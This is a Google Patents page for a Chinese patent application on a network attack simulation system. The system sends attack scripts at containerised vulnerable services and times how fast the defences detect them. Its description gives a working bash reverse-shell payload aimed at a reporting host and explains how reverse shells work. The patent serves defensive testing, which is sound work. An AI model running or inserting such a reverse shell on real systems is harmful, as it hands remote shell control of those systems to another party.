CN116318983A - 一种网络攻击仿真方法、系统、电子设备及可读存储介质 - Google Patents
一种网络攻击仿真方法、系统、电子设备及可读存储介质 Download PDFInfo
- Publication number
- CN116318983A CN116318983A CN202310261143.7A CN202310261143A CN116318983A CN 116318983 A CN116318983 A CN 116318983A CN 202310261143 A CN202310261143 A CN 202310261143A CN 116318983 A CN116318983 A CN 116318983A
- Authority
- CN
- China
- Prior art keywords
- attack
- service
- target range
- verification information
- time
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000000034 method Methods 0.000 title claims abstract description 41
- 238000004088 simulation Methods 0.000 title claims abstract description 30
- 238000003860 storage Methods 0.000 title claims abstract description 20
- 238000001514 detection method Methods 0.000 claims abstract description 38
- 238000013515 script Methods 0.000 claims abstract description 18
- 238000012795 verification Methods 0.000 claims description 61
- 238000002347 injection Methods 0.000 claims description 6
- 239000007924 injection Substances 0.000 claims description 6
- 238000005336 cracking Methods 0.000 claims description 3
- 238000005242 forging Methods 0.000 claims description 3
- 239000000758 substrate Substances 0.000 claims 1
- 230000007123 defense Effects 0.000 abstract description 24
- 238000010586 diagram Methods 0.000 description 5
- 239000012634 fragment Substances 0.000 description 5
- 230000006870 function Effects 0.000 description 5
- 238000005516 engineering process Methods 0.000 description 4
- 244000035744 Hura crepitans Species 0.000 description 3
- 230000003287 optical effect Effects 0.000 description 3
- 238000003491 array Methods 0.000 description 2
- 230000006399 behavior Effects 0.000 description 2
- 238000004590 computer program Methods 0.000 description 2
- 238000002955 isolation Methods 0.000 description 2
- 239000000463 material Substances 0.000 description 2
- 230000008569 process Effects 0.000 description 2
- 241000700605 Viruses Species 0.000 description 1
- 238000012550 audit Methods 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000008859 change Effects 0.000 description 1
- 238000011156 evaluation Methods 0.000 description 1
- 230000003993 interaction Effects 0.000 description 1
- 238000005259 measurement Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 239000013307 optical fiber Substances 0.000 description 1
- 238000012545 processing Methods 0.000 description 1
- 239000004065 semiconductor Substances 0.000 description 1
- 238000007711 solidification Methods 0.000 description 1
- 230000008023 solidification Effects 0.000 description 1
- 230000001960 triggered effect Effects 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
- H04L63/0227—Filtering policies
- H04L63/0236—Filtering by address, protocol, port number or service, e.g. IP-address or URL
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本发明涉及一种网络攻击仿真方法、系统、电子设备及可读存储介质,该方法通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力。
Description
技术领域
本发明涉及网络安全技术领域,具体涉及一种网络攻击仿真方法、系统、电子设备及可读存储介质。
背景技术
随着网络攻击愈演愈烈,企业往往需要部署多种不同类型的安全防护技术。而这些安全防护技术在面对真实攻击时是否能够发挥作用,需要企业定期进行安全评估。
安全评估为通过对企业网络的系统安全检测,web脚本安全检测,以检测报告的形式,及时地告知用户网站存在的安全问题。并针对具体项目,组建临时项目脚本代码安全审计小组,由资深网站程序员及网络安全工程师共通审核网站程序的安全性,找出存在安全隐患程序并准备相关补救程序。
现有技术中对企业网络的系统安全检测属于事后的被动检测,只有当真实的业务环境被攻击时,才能针对被攻击的业务环境提供安全检测,此时企业的业务环境已经受到了攻击的影响,安全防御效率低。
发明内容
为至少在一定程度上克服相关技术中存在的问题,本发明提供一种网络攻击仿真方法、系统、电子设备及可读存储介质,以解决现有技术中对企业网络的系统安全检测属于事后的被动检测,此时企业的业务环境已经受到了攻击的影响,安全防御效率低的问题。
根据本发明实施例的第一方面,提供一种网络攻击仿真方法,所述方法应用于仿真攻击系统,所述仿真攻击系统包括攻击服务以及靶场服务,包括:
所述攻击服务根据预先设定的攻击剧本,向靶场服务发送攻击请求,其中,所述攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
所述靶场服务响应于所述攻击请求,反向连接所述攻击上报服务;
若所述反向连接成功,所述攻击上报服务生成校验信息,并将所述校验信息发送给所述靶场服务;
所述靶场服务根据所述攻击上报服务生成所述校验信息的时间,以及,所述靶场服务接收到所述校验信息的时间,计算所述靶场服务对攻击的检测速度。
可选的,还包括:
所述靶场服务中部署有多个容器,每个容器中封装有一种被模拟的漏洞环境,每个容器作为被攻击目标,对应一个IP端口地址。
可选的,所述漏洞环境至少包括以下项中的一项或多项的组合,包括:
暴力破解、命令注入、跨站请求伪造、文件包含、文件上传漏洞、不安全的验证、SQL注入、反射型跨站脚本攻击、存储型跨站脚本攻击。
可选的,还包括:
预先定义攻击载荷集,并将所述攻击载荷集作为攻击手段存储在攻击知识库中;所述攻击载荷集中存储有多条攻击载荷,每条攻击载荷包含攻击进入靶场服务后需要在远程系统中运行的恶意代码、攻击上报服务的IP端口地址,及攻击成功后需要上报回传的数据。
可选的,所述根据所述攻击上报服务生成所述校验信息的时间,以及,所述靶场服务接收到所述校验信息的时间,计算所述靶场服务对攻击的检测速度,包括:
将所述攻击上报服务生成所述校验信息的时间记录为第一时间;
将所述靶场服务接收到所述校验信息的时间记录为第二时间;
计算每个校验信息所对应的第二时间与第一时间的差值,并将所述差值确定为单次攻击的检测速度。
可选的,所述攻击上报服务在每次反向连接成功时,生成一个校验信息,并将所述校验信息发送给所述靶场服务之后,还包括:
控制所述攻击上报服务断开与所述靶场服务的连接,以等待所述靶场服务下次被攻击时发起的反向连接。
可选的,还包括:
当攻击剧本有多个,且,攻击服务有多个时,为不同的攻击剧本分配不同的攻击服务,每个攻击剧本对应一个攻击服务的IP地址;
将分配好攻击服务的攻击剧本加载在消息队列中,广播给所有的攻击服务,以使每个攻击服务下载与自身IP地址相同的攻击剧本。
可选的,所述校验信息,包括:随机字符串。
根据本发明实施例的第二方面,提供一种网络攻击仿真系统,包括:
攻击上报设备以及靶场设备,其中,
所述攻击上报设备用于根据预先设定的攻击剧本,向靶场设备发送攻击请求,其中,所述攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
所述靶场设备用于响应于所述攻击请求,反向连接所述攻击上报设备;
若所述反向连接成功,所述攻击上报设备还用于生成校验信息,并将所述校验信息发送给所述靶场服务;
所述靶场服务还用于根据所述攻击上报设备生成所述校验信息的时间,及,所述靶场设备接收到所述校验信息的时间,计算所述靶场设备对攻击的检测速度。
根据本发明实施例的第三方面,提供一种网络攻击仿真系统,包括:
攻击设备、上报设备以及靶场设备,其中,
所述攻击设备用于根据预先设定的攻击剧本,向靶场设备发送攻击请求,其中,所述攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
所述靶场设备用于响应于所述攻击请求,反向连接所述上报设备;
若所述反向连接成功,所述上报设备还用于生成校验信息,并将所述校验信息发送给所述靶场服务;
所述靶场服务还用于根据所述上报设备生成所述校验信息的时间,及,所述靶场设备接收到所述校验信息的时间,计算所述靶场设备对攻击的检测速度。
根据本发明实施例的第四方面,提供一种电子设备,包括:
至少一个处理器;以及
与所述至少一个处理器通信连接的存储器;其中,
所述存储器存储有可被所述至少一个处理器执行的指令,所述指令被所述至少一个处理器执行,以使所述至少一个处理器能够执行上述的方法。
根据本发明实施例的第五方面,提供一种存储有计算机指令的非瞬时计算机可读存储介质,其中,所述计算机指令用于使所述计算机执行上述的方法。
本发明的实施例提供的技术方案可以包括以下有益效果:
通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力,提升了企业网的安全度量能力。
应当理解的是,以上的一般描述和后文的细节描述仅是示例性和解释性的,并不能限制本发明。
附图说明
此处的附图被并入说明书中并构成本说明书的一部分,示出了符合本发明的实施例,并与说明书一起用于解释本发明的原理。
图1是根据一示例性实施例示出的一种网络攻击仿真方法的流程图;
图2是根据一示例性实施例示出的一种网络攻击仿真系统的示意框图;
图3是根据一示例性实施例示出的又一种网络攻击仿真系统的示意框图;
图4是根据一示例性实施例示出的一种电子设备的结构示意图。
具体实施方式
这里将详细地对示例性实施例进行说明,其示例表示在附图中。下面的描述涉及附图时,除非另有表示,不同附图中的相同数字表示相同或相似的要素。以下示例性实施例中所描述的实施方式并不代表与本发明相一致的所有实施方式。相反,它们仅是与如所附权利要求书中所详述的、本发明的一些方面相一致的装置和方法的例子。
如背景技术,现有技术中对企业网络的系统安全检测属于事后的被动检测,此时企业的业务环境已经受到了攻击的影响,安全防御效率低,本发明提供了以下几个示例性实施例。
图1是根据一示例性实施例示出的一种网络攻击仿真方法的流程图,该方法应用于仿真攻击系统,仿真攻击系统包括攻击服务以及靶场服务。如图1所示,该方法包括:
步骤S11、攻击服务根据预先设定的攻击剧本,向靶场服务发送攻击请求,其中,攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
步骤S12、靶场服务响应于攻击请求,反向连接攻击上报服务;
步骤S13、若反向连接成功,攻击上报服务生成校验信息,并将校验信息发送给靶场服务;
步骤S14、靶场服务根据攻击上报服务生成校验信息的时间,以及,靶场服务接收到校验信息的时间,计算靶场服务对攻击的检测速度。
在具体实践中,靶场服务中部署有多个容器,每个容器中封装有一种被模拟的漏洞环境,每个容器作为被攻击目标,对应一个IP端口地址。
需要说明的是,本实施例提供的技术方案,加载在电子设备中运行。
在具体实践中,攻击剧本除了包括被攻击目标的IP端口地址和攻击手段外,还可以包括攻击周期。攻击周期为攻击的频率,例如,每隔多少秒攻击一次。攻击手段可以通过如下途径获取,包括:
预先定义攻击载荷集,并将攻击载荷集作为攻击手段存储在攻击知识库中;攻击载荷集中存储有多条攻击载荷,每条攻击载荷包含攻击进入靶场服务后需要在远程系统中运行的恶意代码、攻击上报服务的IP端口地址,及攻击成功后需要上报回传的数据。
用户设定攻击剧本时,从攻击知识库中选取攻击载荷作为攻击手段。
需要说明的是,攻击载荷是指用户希望对目标系统攻击成功之后去执行的代码。例如,创建一个Meterpreter连接或者通过绑定到一个监听端口,来获取Shell交互。也可以利用攻击载荷在目标操作系统上执行一些命令,如添加账号等。本实施例中,可以通过事先定义多种不同类型的反弹shell作为攻击载荷。
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
反弹shell通常适用于如下几种情况:
目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
目标机端口被占用。
目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。
......
对于以上几种情况,无法利用正向连接的,要用反向连接。反向连接就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。
在具体实践中,可以定义攻击载荷由攻击片段+数据上报片段+随机混淆片段组成。
例如,攻击载荷:bash-i>&/dev/tcp/10.71.5.222/666 0>&1;echo'xxx'
其中,“bash-i>&/dev/tcp/”为攻击片段,用于触发攻击;“10.71.5.222/666”为数据上报片段,用于表示攻击成功后,向IP地址为10.71.5.222的攻击上报服务器返回数字“666”,以告知攻击上报服务器攻击成功;“echo'xxx'”为随机混淆片段,用于检测靶场服务的安全检测能力。
其中,校验信息为随机字符串。
在具体实践中,'xxx'可以为$RANDOM,RANDOM是linux系统一个系统命令,可以生成随机数。echo$RANDOM表示攻击服务echo本地输出了随机数15365,当靶场服务检测攻击发现到反弹shell行为,并且捕获到输出随机数15365,两边比对通过,说明靶场服务检测没有遗漏。
步骤S11中“攻击服务根据预先设定的攻击剧本,向靶场服务发送攻击请求,靶场服务响应于攻击请求,反向连接攻击上报服务”即为:
根据预先设定的攻击剧本,攻击服务将攻击载荷发送给靶场服务中的指定漏洞服务端口(即,被攻击目标的IP端口地址),靶场服务接受到请求后,触发了对应的攻击载荷行为,反向连接攻击上报服务。
在具体实践中,参见图2、图3,为了保证靶场服务的服务安全性,避免靶场服务被其他黑客利用攻击,一般指定一个默认的漏洞服务端口(即,被攻击目标的IP端口地址),例如指定漏洞服务端口为80或指定端口为443。指定漏洞服务端口后,默认该漏洞服务端口只允许攻击服务访问,禁止其他机器IP访问。
另外,为了保证靶场服务的服务安全性,控制靶场服务中的容器只允许访问攻击上报服务,禁止访问其他机器IP,以防止被黑客利用攻击。
可以理解的是,通过对靶场服务的漏洞服务端口的指定化及控制靶场服务中的容器只允许访问攻击上报服务,可以实现靶场服务的安全隔离。
另外,在靶场服务中部署有多个容器,每个容器中封装有一种被模拟的漏洞环境,每个容器作为被攻击目标,对应一个IP端口地址。可以将常见的漏洞环境封装为容器,方便漏洞环境的模拟和固化,便于多次使用。
为了进一步提高安全性,可以为每个容器部署一个沙箱,为容器构建更强的信任边界。可以理解的是,本实施例提供的技术方案,通过容器及沙箱隔离技术,控制危害在沙箱内部,避免了攻击对业务造成危害。
另外,也可以对某个容器按需开启,只在需要的时候启动对应的容器,否则关闭容器,以节省计算资源。
在具体实践中,漏洞环境至少包括以下项中的一项或多项的组合,包括:
暴力破解、命令注入、跨站请求伪造、文件包含、文件上传漏洞、不安全的验证、SQL注入、反射型跨站脚本攻击、存储型跨站脚本攻击。
在具体实践中,攻击剧本会有多个,攻击服务也会有多个。
当攻击剧本有多个,且,攻击服务有多个时,为不同的攻击剧本分配不同的攻击服务,每个攻击剧本对应一个攻击服务的IP地址;
将分配好攻击服务的攻击剧本加载在消息队列中,广播给所有的攻击服务,以使每个攻击服务下载与自身IP地址相同的攻击剧本。
步骤S12中“反向连接成功,攻击上报服务生成校验信息,并将校验信息发送给靶场服务”,其中,校验信息为随机字符串,具体为:
由于攻击载荷中记录有攻击上报服务的IP地址及攻击成功后靶场服务需要反馈的数字,因此,靶场服务在受到攻击后,会向攻击上报服务器上报该数字,当攻击上报服务器接收到该数字后,就默认是反向连接成功。
在每次反向连接成功后,攻击上报服务会生成一个随机字符串,例如X1,并生成一条攻击日志:t1,X1,其中t1为攻击上报服务生成随机字符串X1的时间;同时,攻击上报服务将随机字符串X1反馈给靶场服务。
靶场服务会将接收到随机字符串的时间记录为第二时间t2,并生成一条检测日志:t2,X1。
在具体实践中,攻击上报服务在每次反向连接成功时,生成一个校验信息,并将校验信息发送给靶场服务之后,还包括:
控制攻击上报服务断开与靶场服务的连接,以等待靶场服务下次被攻击时发起的反向连接。
步骤S14中“根据攻击上报服务生成校验信息的时间,以及,靶场服务接收到校验信息的时间,计算靶场服务对攻击的检测速度”,包括:
将攻击上报服务生成校验信息的时间记录为第一时间t1;
将靶场服务接收到校验信息的时间记录为第二时间t2;
计算每个校验信息所对应的第二时间t2与第一时间的差值t1,并将差值确定为单次攻击的检测速度T,即单次攻击的检测速度T1=t2-t1。
对所有单次攻击的检测速度求平均值,得到多次攻击的平均检测速度,即T=(T1+T2+...+Tn)/n,其中,n≥1,Tn为第n次的检测速度。
可以理解的是,本实施例提供的技术方案,通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力。
基于一个总的发明构思,本发明示例性实施例还提供一种网络攻击仿真系统。
图2为根据一示例性实施例示出的一种网络攻击仿真系统的结构示意图,如图2所示,该系统可以包括:攻击上报设备21以及靶场设备22,其中,
攻击上报设备用于根据预先设定的攻击剧本,向靶场设备发送攻击请求,其中,攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
靶场设备用于响应于攻击请求,反向连接攻击上报设备;
若反向连接成功,攻击上报设备还用于生成校验信息,并将校验信息发送给靶场服务;
靶场服务还用于根据攻击上报设备生成校验信息的时间,及,靶场设备接收到校验信息的时间,计算靶场设备对攻击的检测速度。
需要说明的是,本系统中各部分的具体执行步骤已经在有关该方法的实施例中进行说明,本实施例中不做赘述。
可以理解的是,本实施例提供的技术方案,通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力。
图3为根据一示例性实施例示出的又一种网络攻击仿真系统的结构示意图,该系统可以包括:
攻击设备31、上报设备32以及靶场设备22,其中,
攻击设备用于根据预先设定的攻击剧本,向靶场设备发送攻击请求,其中,攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
靶场设备用于响应于攻击请求,反向连接上报设备;
若反向连接成功,上报设备还用于生成校验信息,并将校验信息发送给靶场服务;
靶场服务还用于根据上报设备生成校验信息的时间,及,靶场设备接收到校验信息的时间,计算靶场设备对攻击的检测速度。
需要说明的是,本系统中各部分的具体执行步骤已经在有关该方法的实施例中进行说明,本实施例中不做赘述。
可以理解的是,本实施例提供的技术方案,通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力。
基于一个总的发明构思,本发明示例性实施例还提供一种电子设备。
图4是根据一示例性实施例示出的一种电子设备的结构示意图,如图4所示,根据一示例性实施例示出的一种电子设备,包括:
至少一个处理器41;以及
与至少一个处理器通信连接的存储器42;其中,
存储器存储有可被至少一个处理器执行的指令,指令被至少一个处理器执行,以使至少一个处理器能够执行上述的方法。
需要说明的是,电子设备包括但不限于:智能终端(例如,手机、平板电脑、智能手表等)和计算机设备。
处理器包括但不限于:CPU、单片机、PLC控制器、FPGA控制器等。
存储器可以包括易失性存储器形式的计算机系统可读介质,例如随机存取存储器(RAM)和/或高速缓存存储器;还可以包括其它可移动/不可移动的、易失性/非易失性计算机系统存储介质。存储器可以包括至少一个程序产品,该程序产品具有一组(例如至少一个)程序模块,这些程序模块被配置以执行本发明各实施例的功能。
可以理解的是,本实施例提供的技术方案,通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力。
根据一示例性实施例示出的一种存储有计算机指令的非瞬时计算机可读存储介质,其中,计算机指令用于使计算机执行上述的方法。
根据一示例性实施例示出的一种计算机程序产品,包括计算机程序,计算机程序在被处理器执行时实现上述的方法。
本实施例公开的计算机可读存储介质包括但不限于:电、磁、光、电磁、红外线、或半导体的系统、装置或器件,或者任意以上的组合。计算机可读存储介质的更具体的例子(非穷举的列表)包括:具有一个或多个导线的电连接、便携式计算机磁盘、硬盘、随机存取存储器(RAM)、只读存储器(ROM)、可擦式可编程只读存储器(EPROM或闪存)、光纤、便携式紧凑磁盘只读存储器(CD-ROM)、光存储器件、磁存储器件、或者上述的任意合适的组合。在本发明中,计算机可读存储介质可以是任何包含或存储程序的有形介质,该程序可以被指令执行系统、装置或者器件使用或者与其结合使用。
可以理解的是,本实施例提供的技术方案,通过在靶场服务中模拟多种漏洞环境,并通过攻击剧本预先定义各种攻击场景,控制攻击服务向靶场服务发送攻击请求,实现攻击链路的真实场景演练,再通过度量靶场服务对攻击的检测速度,从而验证靶场服务的安全防御能力是否可靠,做到事前主动防御,提升了安全防御的可靠性,避免了真实攻击发生时对业务的影响,提升了企业网络的网络攻击仿真能力。
需要说明的是,在本发明的描述中,术语“第一”、“第二”等仅用于描述目的,而不能理解为指示或暗示相对重要性。此外,在本发明的描述中,除非另有说明,“多个”的含义是指至少两个。
流程图中或在此以其他方式描述的任何过程或方法描述可以被理解为,表示包括一个或更多个用于实现特定逻辑功能或过程的步骤的可执行指令的代码的模块、片段或部分,并且本发明的优选实施方式的范围包括另外的实现,其中可以不按所示出或讨论的顺序,包括根据所涉及的功能按基本同时的方式或按相反的顺序,来执行功能,这应被本发明的实施例所属技术领域的技术人员所理解。
应当理解,本发明的各部分可以用硬件、软件、固件或它们的组合来实现。在上述实施方式中,多个步骤或方法可以用存储在存储器中且由合适的指令执行系统执行的软件或固件来实现。例如,如果用硬件来实现,和在另一实施方式中一样,可用本领域公知的下列技术中的任一项或他们的组合来实现:具有用于对数据信号实现逻辑功能的逻辑门电路的离散逻辑电路,具有合适的组合逻辑门电路的专用集成电路,可编程门阵列(PGA),现场可编程门阵列(FPGA)等。
本技术领域的普通技术人员可以理解实现上述实施例方法携带的全部或部分步骤是可以通过程序来指令相关的硬件完成,所述的程序可以存储于一种计算机可读存储介质中,该程序在执行时,包括方法实施例的步骤之一或其组合。
此外,在本发明各个实施例中的各功能单元可以集成在一个处理模块中,也可以是各个单元单独物理存在,也可以两个或两个以上单元集成在一个模块中。上述集成的模块既可以采用硬件的形式实现,也可以采用软件功能模块的形式实现。所述集成的模块如果以软件功能模块的形式实现并作为独立的产品销售或使用时,也可以存储在一个计算机可读取存储介质中。
上述提到的存储介质可以是只读存储器,磁盘或光盘等。
在本说明书的描述中,参考术语“一个实施例”、“一些实施例”、“示例”、“具体示例”、或“一些示例”等的描述意指结合该实施例或示例描述的具体特征、结构、材料或者特点包含于本发明的至少一个实施例或示例中。在本说明书中,对上述术语的示意性表述不一定指的是相同的实施例或示例。而且,描述的具体特征、结构、材料或者特点可以在任何的一个或多个实施例或示例中以合适的方式结合。
尽管上面已经示出和描述了本发明的实施例,可以理解的是,上述实施例是示例性的,不能理解为对本发明的限制,本领域的普通技术人员在本发明的范围内可以对上述实施例进行变化、修改、替换和变型。
Claims (12)
1.一种网络攻击仿真方法,其特征在于,所述方法应用于仿真攻击系统,所述仿真攻击系统包括攻击服务以及靶场服务,所述方法包括:
所述攻击服务根据预先设定的攻击剧本,向靶场服务发送攻击请求,其中,所述攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
所述靶场服务响应于所述攻击请求,反向连接所述攻击上报服务;
若所述反向连接成功,所述攻击上报服务生成校验信息,并将所述校验信息发送给所述靶场服务;
所述靶场服务根据所述攻击上报服务生成所述校验信息的时间,以及,所述靶场服务接收到所述校验信息的时间,计算所述靶场服务对攻击的检测速度。
2.根据权利要求1所述的方法,其特征在于,还包括:
所述靶场服务中部署有多个容器,每个容器中封装有一种被模拟的漏洞环境,每个容器作为被攻击目标,对应一个IP端口地址。
3.根据权利要求2所述的方法,其特征在于,
所述漏洞环境至少包括以下项中的一项或多项的组合,包括:
暴力破解、命令注入、跨站请求伪造、文件包含、文件上传漏洞、不安全的验证、SQL注入、反射型跨站脚本攻击、存储型跨站脚本攻击。
4.根据权利要求1所述的方法,其特征在于,还包括:
预先定义攻击载荷集,并将所述攻击载荷集作为攻击手段存储在攻击知识库中;所述攻击载荷集中存储有多条攻击载荷,每条攻击载荷包含攻击进入靶场服务后需要在远程系统中运行的恶意代码、攻击上报服务的IP端口地址,及攻击成功后需要上报回传的数据。
5.根据权利要求1所述的方法,其特征在于,所述根据所述攻击上报服务生成所述校验信息的时间,以及,所述靶场服务接收到所述校验信息的时间,计算所述靶场服务对攻击的检测速度,包括:
将所述攻击上报服务生成所述校验信息的时间记录为第一时间;
将所述靶场服务接收到所述校验信息的时间记录为第二时间;
计算每个校验信息所对应的第二时间与第一时间的差值,并将所述差值确定为单次攻击的检测速度。
6.根据权利要求1所述的方法,其特征在于,所述攻击上报服务在每次反向连接成功时,生成一个校验信息,并将所述校验信息发送给所述靶场服务之后,还包括:
控制所述攻击上报服务断开与所述靶场服务的连接,以等待所述靶场服务下次被攻击时发起的反向连接。
7.根据权利要求1~6任一项所述的方法,其特征在于,还包括:
当攻击剧本有多个,且,攻击服务有多个时,为不同的攻击剧本分配不同的攻击服务,每个攻击剧本对应一个攻击服务的IP地址;
将分配好攻击服务的攻击剧本加载在消息队列中,广播给所有的攻击服务,以使每个攻击服务下载与自身IP地址相同的攻击剧本。
8.根据权利要求1~6任一项所述的方法,其特征在于,所述校验信息,包括:随机字符串。
9.一种网络攻击仿真系统,其特征在于,包括:
攻击上报设备以及靶场设备,其中,
所述攻击上报设备用于根据预先设定的攻击剧本,向靶场设备发送攻击请求,其中,所述攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
所述靶场设备用于响应于所述攻击请求,反向连接所述攻击上报设备;
若所述反向连接成功,所述攻击上报设备还用于生成校验信息,并将所述校验信息发送给所述靶场服务;
所述靶场服务还用于根据所述攻击上报设备生成所述校验信息的时间,及,所述靶场设备接收到所述校验信息的时间,计算所述靶场设备对攻击的检测速度。
10.一种网络攻击仿真系统,其特征在于,包括:
攻击设备、上报设备以及靶场设备,其中,
所述攻击设备用于根据预先设定的攻击剧本,向靶场设备发送攻击请求,其中,所述攻击剧本至少包括:被攻击目标的IP端口地址和攻击手段;
所述靶场设备用于响应于所述攻击请求,反向连接所述上报设备;
若所述反向连接成功,所述上报设备还用于生成校验信息,并将所述校验信息发送给所述靶场服务;
所述靶场服务还用于根据所述上报设备生成所述校验信息的时间,及,所述靶场设备接收到所述校验信息的时间,计算所述靶场设备对攻击的检测速度。
11.一种电子设备,包括:
至少一个处理器;以及
与所述至少一个处理器通信连接的存储器;其中,
所述存储器存储有可被所述至少一个处理器执行的指令,所述指令被所述至少一个处理器执行,以使所述至少一个处理器能够执行权利要求1-8中任一项所述的方法。
12.一种存储有计算机指令的非瞬时计算机可读存储介质,其中,所述计算机指令用于使所述计算机执行权利要求1-8中任一项所述的方法。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202310261143.7A CN116318983A (zh) | 2023-03-10 | 2023-03-10 | 一种网络攻击仿真方法、系统、电子设备及可读存储介质 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202310261143.7A CN116318983A (zh) | 2023-03-10 | 2023-03-10 | 一种网络攻击仿真方法、系统、电子设备及可读存储介质 |
Publications (1)
Publication Number | Publication Date |
---|---|
CN116318983A true CN116318983A (zh) | 2023-06-23 |
Family
ID=86837510
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202310261143.7A Pending CN116318983A (zh) | 2023-03-10 | 2023-03-10 | 一种网络攻击仿真方法、系统、电子设备及可读存储介质 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN116318983A (zh) |
Cited By (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN116866193A (zh) * | 2023-09-05 | 2023-10-10 | 中国电子信息产业集团有限公司第六研究所 | 一种网络攻击演练方法、装置、电子设备及存储介质 |
CN116886423A (zh) * | 2023-08-15 | 2023-10-13 | 广东中山网传媒信息科技有限公司 | 一种服务器安全异常检测方法与系统 |
CN117610018A (zh) * | 2023-12-01 | 2024-02-27 | 深圳市马博士网络科技有限公司 | 漏洞模拟方法及装置 |
-
2023
- 2023-03-10 CN CN202310261143.7A patent/CN116318983A/zh active Pending
Cited By (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN116886423A (zh) * | 2023-08-15 | 2023-10-13 | 广东中山网传媒信息科技有限公司 | 一种服务器安全异常检测方法与系统 |
